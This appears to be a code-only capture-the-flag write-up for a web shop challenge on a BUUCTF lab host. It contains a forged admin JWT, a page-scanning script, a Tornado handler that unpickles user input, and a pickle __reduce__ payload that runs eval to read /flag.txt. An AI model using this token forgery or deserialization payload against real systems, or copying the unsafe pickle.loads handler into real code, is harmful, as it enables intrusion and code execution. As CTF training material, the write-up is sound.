复制 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYWEifQ.bJejEdbt0h9U-vvnfoUAF7JFOPy0o6LqHQnITMhYL2I
复制 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
复制 >>> s='\\u8fd9\\u7f51\\u7ad9\\u4e0d\\u4ec5\\u53ef\\u4ee5\\u4ee5\\u8585\\u7f8a\\u6bdb\\uff0c\\u6211\\u8fd8\\u7559\\u4e86\\u4e2a\\u540e\\u95e8\\uff0c\\u5c31\\u85cf\\u5728\\u006c\\u0076\\u0036\\u91cc'
>>> s.encode('utf8').decode('unicode_escape')
'这网站不仅可以以薅羊毛,我还留了个后门,就藏在lv6里'
复制 import requests
url = 'http://d34fe1a5-ca55-4b0b-9f8e-52d8f8a89f48.node4.buuoj.cn:81/shop?page=2'
for i in range(1,999999):
url = f'http://d34fe1a5-ca55-4b0b-9f8e-52d8f8a89f48.node4.buuoj.cn:81/shop?page={str(i)}'
r = requests.get(url)
if '/static/img/lv/lv6' in r.text:
print(url)
break
复制 handlers = [
(r'/', ShopIndexHandler),
(r'/shop', ShopListHandler),
(r'/info/(\d+)', ShopDetailHandler),
(r'/shopcar', ShopCarHandler),
(r'/shopcar/add', ShopCarAddHandler),
(r'/pay', ShopPayHandler),
(r'/user', UserInfoHandler),
(r'/user/change', changePasswordHandler),
(r'/pass/reset', ResetPasswordHanlder),
(r'/login', UserLoginHanlder),
(r'/logout', UserLogoutHandler),
(r'/register', RegisterHandler),
(r'/b1g_m4mber', AdminHandler)
]
复制 class AdminHandler(BaseHandler):
@tornado.web.authenticated
def get(self, *args, **kwargs):
if self.current_user == "admin":
return self.render('form.html', res='This is Black Technology!', member=0)
else:
return self.render('no_ass.html')
@tornado.web.authenticated
def post(self, *args, **kwargs):
try:
become = self.get_argument('become')
p = pickle.loads(urllib.unquote(become))
return self.render('form.html', res=p, member=1)
except:
return self.render('form.html', res='This is Black Technology!', member=0)
复制 # python2
import pickle
import urllib
class payload(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()",))
a = pickle.dumps(payload())
a = urllib.quote(a)
print a
复制 c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A. 
